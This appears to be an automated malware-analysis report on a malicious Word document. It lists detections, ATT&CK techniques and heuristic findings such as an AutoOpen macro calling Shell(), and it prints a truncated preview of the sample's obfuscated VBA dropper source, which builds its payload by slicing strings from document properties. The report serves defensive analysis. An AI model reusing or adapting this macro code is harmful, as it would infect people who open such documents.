MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoOpen macro, which is automatically executed upon opening the document, utilizes the Shell() function to execute a payload. This is further supported by ClamAV detection identifying it as a dropper. The VBA script itself is heavily obfuscated, making it difficult to determine the exact nature of the payload or its destination.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6348619-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6348619-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10825 bytes |
SHA-256: dccf1e5a2cf9ee7538e2e38f7a234c099dd3697120e3ebddac029411febb1c9f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub PPjhodSdk() AMbbEuM = "1QtPZcqaPkcYRYUBCjLLanjzQwLdrsMHwjGZRPmjPPzcNZ1HM53ALDI41JUUQAAMPA8Q" MfYhZsNNa = Mid(AMbbEuM, 2, 44) IScBQjXjtUm = MfYhZsNNa wXHiYU = "7OX1QVicCBPmiVkjvwdRNjXYVZkSujmtBQOP6WTV3" BRswv = Mid(wXHiYU, 5, 28) EYBrsGNkoZM = BRswv OmbGjMpTYi = "0BIRVE4CUtkMVoftNUvXAiLSRWVVDtwtFRviXLwhvsJJlKOFjOYofiENIPVhLjwbwrGDtBVBWNbQ253E0" LvqaKzvY = Mid(OmbGjMpTYi, 8, 68) REdPTwiZfPP = LvqaKzvY cNEXuNLqRR = "HB14RcvKoHjzbjAoqwUULBS0KY" KILnidP = Mid(cNEXuNLqRR, 6, 16) JSXjZrcziP = KILnidP RQhanJljV = "L8SKmApjEK310GJUJV5LRA30NNKOHJW" hnRkVGsn = Mid(RQhanJljV, 5, 4) XDnvwRN = hnRkVGsn ZZwSGo = "QNEBUBAH2XJTZOMSJDRKMKvqOAwDUrjiwLWJYuMOpoGOkLfFTHWrwFwV81ORHB23" YmVTju = Mid(ZZwSGo, 22, 34) PGwURAHOwM = YmVTju polMRH = "2TS95F5FjEu7REG" kZzzfICh = Mid(polMRH, 9, 3) KdmNV = kZzzfICh iFnLAfas = "UFBBO325TQMBWDTURW8QHOBuiCWXjtOHlIaBEwUhmEjFS3" pWihVdf = Mid(iFnLAfas, 22, 23) OLYAa = pWihVdf iBVnwzzbDjH = "MB4K9ODQ4UPXEHZCjGHPmpVIObNiVIqQWMuiMuDKMitWSRCzoGiOaQ8AFW374G" BwrXo = Mid(iBVnwzzbDjH, 14, 40) PUZOnOwcDrl = BwrXo XjDXUNH = "HYKBGNJ356BNFQNB6C14" TuIqmkaSzz = Mid(XjDXUNH, 18, 1) YwGFJt = TuIqmkaSzz BpQWkml = "TAAQT0AHDvwJFodfqKfMLGqPNqpmDwDEwwqwYJZ31A6B" fTWRdt = Mid(BpQWkml, 10, 28) IhDAaBGwq = fTWRdt hWbaKT = "NZ5LT3AVtVRJSCjcEsrkLhSPWKiKwZMwCkMuhbAFYzBOVjKsiLCrIqVSVaaJmAYTJSHhqmudrlMOOO0NKKR" AWnpzzNvta = Mid(hWbaKT, 8, 69) HBQrqm = AWnpzzNvta rJiAarbZt = "" + jRGPEu + RmVfm + lmdnthw + CWBiW + qiffMX + DLvAUEY + TsBfP + wSHYI + juFhhi + mHqTO + hainZcZw + iACHGuL + "com" + "ments" + jRGPEu + RmVfm + lmdnthw + CWBiW + qiffMX + DLvAUEY + TsBfP + wSHYI + juFhhi + mHqTO + hainZcZw + iACHGuL + GDBQWR + SmaNRLBi + TbVkTz + vVwQFia + YGArTYYh kwiFo = Right(Left((ChVAicZMJ(rJiAarbZt)), 9951), 5) TGaSfjirck = Mid((ChVAicZMJ(rJiAarbZt)), 11394, 89) hJMjFvN = Mid((ChVAicZMJ(rJiAarbZt)), 10167, 119) IciEJd = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 749), 123) GVJBGtim = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 352), 135) MRtNjKUJwYO = Mid((ChVAicZMJ(rJiAarbZt)), 9750, 103) bscKiw = Right(Left((ChVAicZMJ(rJiAarbZt)), 14384), 149) FlSWOUUa = Right(Left((ChVAicZMJ(rJiAarbZt)), 7570), 76) zVwARPvvU = Right(Left((ChVAicZMJ(rJiAarbZt)), 6176), 140) hUKdLhIdiDp = Mid((ChVAicZMJ(rJiAarbZt)), 11245, 108) HjarRpAj = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 12719), 26) QGOaaMPjciX = Mid((ChVAicZMJ(rJiAarbZt)), 12976, 15) HsDnLwh = Right(Left((ChVAicZMJ(rJiAarbZt)), 343), 100) zUskpD = Mid((ChVAicZMJ(rJiAarbZt)), 9407, 117) jPAauWwHh = Right(Left((ChVAicZMJ(rJiAarbZt)), 6464), 32) UNsEjQS = Mid((ChVAicZMJ(rJiAarbZt)), 7429, 22) ComzTJ = Right(Left((ChVAicZMJ(rJiAarbZt)), 4780), 57) hqXMFzuIXpN = Mid((ChVAicZMJ(rJiAarbZt)), 1679, 81) fdfOG = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 14071), 135) QJUWE = Mid((ChVAicZMJ(rJiAarbZt)), 4984, 119) ucBHkPDZ = Right(Left((ChVAicZMJ(rJiAarbZt)), 5611), 76) HOPzvMaEdHW = Mid((ChVAicZMJ(rJiAarbZt)), 939, 28) kMOAcY = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 9917), 25) HqVzf = Mid((ChVAicZMJ(rJiAarbZt)), 1803, 139) cGCGllHrf = Right(Left((ChVAicZMJ(rJiAarbZt)), 8880), 91) wtRaIGj = Mid((ChVAicZMJ(rJiAarbZt)), 569, 132) vWObAWt = Mid((ChVAicZMJ(rJiAarbZt)), 11968, 66) uzQrtcXE = Mid((ChVAicZMJ(rJiAarbZt)), 3715, 91) VdUjqHcb = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 3500), 40) hPQKEmGrb = Mid((ChVAicZMJ(rJiAarbZt)), 6922, 121) sHTlLEE = Mid((ChVAicZMJ(rJiAarbZt)), 7192, 69) DDqKznamYT = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 6470), 75) KSqihFnGVjc = Right(Left((ChVAicZMJ(rJiAarbZt)), 14607), 138) dVBwiD = Mid((ChVAicZMJ(rJiAarbZt)), 10314, 71) sdiY ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.